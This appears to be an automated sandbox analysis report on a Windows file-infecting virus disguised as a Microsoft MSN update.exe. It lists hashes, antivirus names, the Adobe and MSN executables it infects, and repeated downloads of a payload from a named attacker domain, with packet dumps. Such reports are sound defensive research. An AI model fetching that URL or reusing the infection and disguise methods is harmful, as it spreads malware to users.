Analysis Date2016-01-07 13:31:34
MD5c721b7e2c72d37fd4e422aa14b44e5d9
SHA19aa9382a8aceda7a6fe270f808d05701d33ea601

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4541819bd3a94a6e0cb6b8a5e32ce1c6 sha1: e6f3f8576709092ce91015520ebf0c013d2ab1fc size: 61440
Section.data md5: 36eaf6f5bdc13c89f41f0f2dac895890 sha1: 78d827534867d63228565c5edb33763dc72db827 size: 4096
Section.rsrc md5: d7155ad801552d74a91f9302ecaae230 sha1: 6690fe5bf31927b5f2239e17f5e03d7b4880383a size: 8192
Sectione;5u
md5: 418b5c7723d658184261490ff1552dfb sha1: b7cd75df665783e02a4881b35157b53dd81a0c67 size: 20480
Timestamp2001-07-19 19:30:03
Pdb pathdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: update
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: update
OriginalFilename: update.exe
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: update
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: update
OriginalFilename: update.exe
PEhashfeec475ba12cf4d68908e50d598e6dac5ebd82a6
IMPhashb51f22a4896575229889a74a6c48f13a
AVCA (E-Trust Ino)Win32/Nimnul.A
AVRisingWin32.Roue.a
AVMcafeeW32/Kudj
AVAvira (antivir)W32/Jadtre.B
AVTwisterVirus.558BEC81EC@120000#.mg
AVAd-AwareWin32.VJadtre.3
AVAlwil (avast)Malware-gen:Evo-gen [Susp]:Win32:Malware-gen
AVEset (nod32)Win32/Wapomi.BA virus
AVGrisoft (avg)Win32/Wapomi.I
AVSymantecW32.Wapomi.C!inf
AVFortinetW32/Nimnul.F
AVBitDefenderWin32.VJadtre.3
AVK7Virus ( 0040f7441 )
AVMicrosoft Security EssentialsVirus:Win32/Mikcer.B
AVMicroWorld (escan)Win32.VJadtre.3
AVMalwareBytesno_virus
AVAuthentiumW32/PatchLoad.E
AVFrisk (f-prot)W32/PatchLoad.E
AVIkarusTrojan-Downloader.Win32.Small
AVEmsisoftWin32.VJadtre.3
AVZillya!Virus.Nimnul.Win32.5
AVKasperskyVirus.Win32.Nimnul.f
AVTrend MicroPE_WAPOMI.BM
AVCAT (quickheal)W32.Nimnul.F1
AVVirusBlokAda (vba32)Virus.Nimnul.19209
AVBullGuardWin32.VJadtre.3
AVArcabit (arcavir)Win32.VJadtre.3
AVClamAVWin.Trojan.Downloader-64296
AVDr. WebBackDoor.Darkshell.246
AVF-SecureWin32.VJadtre.3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe
Creates Mutex{BB7E11D6-5E67-4005-A530-ED1831D6A427}

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\GTplus\Time ➝
NULL
Creates FileC:\temp\files\AcroRd32.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\temp\files\malware.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\temp\files\monitor.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\22b810e9.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FilePIPE\lsarpc
Creates FileC:\temp\files\mGYKk.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Network Details:

DNSddos.dnsnb8.net
Type: A
23.253.76.160
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1033 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1034 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1035 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1036 ➝ 23.253.76.160:799

Raw Pcap
0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....


Strings